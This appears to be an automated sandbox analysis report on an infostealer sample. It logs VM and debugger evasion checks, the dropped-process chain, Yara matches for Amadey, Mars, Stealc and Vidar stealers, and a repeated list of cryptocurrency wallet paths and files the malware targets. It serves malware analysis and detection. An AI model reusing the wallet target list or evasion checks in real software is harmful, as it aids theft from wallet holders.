Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: VBoxService.exe
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: KJEBKJDA.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: KJEBKJDA.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: KJEBKJDA.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: VMWare
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: KJEBKJDA.0.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: KJEBKJDA.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2623849094.000000000166F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWA
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: #Windows 11 Microsoft Hyper-V Server

Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe

Code function: 10_2_04CD0ADC rdtsc

10_2_04CD0ADC

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CA15FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6CA15FF0

Source: C:\Users\user\Desktop\file.exe

0_2_6C9B3480

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 14_2_009E643B mov eax, dword ptr fs:[00000030h]		14_2_009E643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 14_2_009EA1A2 mov eax, dword ptr fs:[00000030h]		14_2_009EA1A2

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9EB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C9EB66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9EB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C9EB1F7

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GDHIIIIEHC.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe "C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe"	Jump to behavior

Source: explorti.exe, explorti.exe, 0000000D.00000002.2719044484.0000000000BAB000.00000040.00000001.01000000.0000000D.sdmp

Binary or memory string: 3iProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C9EB341 cpuid

0_2_6C9EB341

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C9B35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,

0_2_6C9B35A0

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Code function: 14_2_009B6590 LookupAccountNameA,

14_2_009B6590

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 12.2.explorti.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.explorti.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorti.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.BAFIEGIECG.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000003.2668322526.0000000005160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2760972491.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2677594002.00000000003F1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2678309307.0000000004890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2718941030.00000000009B1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3412646742.00000000009B1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2708594114.00000000009B1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2636976626.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Mars stealer

Source: Yara match	File source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.7873c16243.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2838460669.0000000000DB1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2622413487.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2623849094.0000000001605000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7873c16243.exe PID: 6984, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.7873c16243.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2838460669.0000000000DB1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2622413487.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4368, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
